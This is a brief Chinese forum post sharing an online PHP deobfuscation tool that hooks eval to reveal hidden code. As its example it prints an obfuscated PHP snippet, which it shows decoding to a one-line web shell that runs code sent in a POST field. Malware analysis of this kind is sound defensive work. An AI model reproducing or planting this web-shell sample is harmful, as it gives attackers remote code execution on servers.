分享一个小工具-在线解密PHP文件
kuuki 安全工具 32271浏览 · 2016-10-20 23:36

地址:http://decode.laosiji.work/
采用hook eval的方式,把执行的内容回显出来

比如

<?php
$s = "F9QivT1NUWyd";$v = "QGivV2YivWwoJ";$j = "mJ10pOw=iv=";
$re = str_replace("iv","","sivtr_ivrepivlaivce");
$ba = $re("nf","","bnfanfse6nf4_nfdecnfode");
$fun = $re("vf","","cvfreavfte_fvfunctvfion");
$vi = $fun("",$ba($re("iv","",$v.$s.$j)));$vi();

还原出来就是

function __lambda_func(){@eval($_POST['f']);}

https://github.com/bizonix/evalhook 基础上改写,并且自己加了个docker来运行php文件,有兴趣的同学可以研究下!~

1 条评论
某人
表情
可输入 255
目录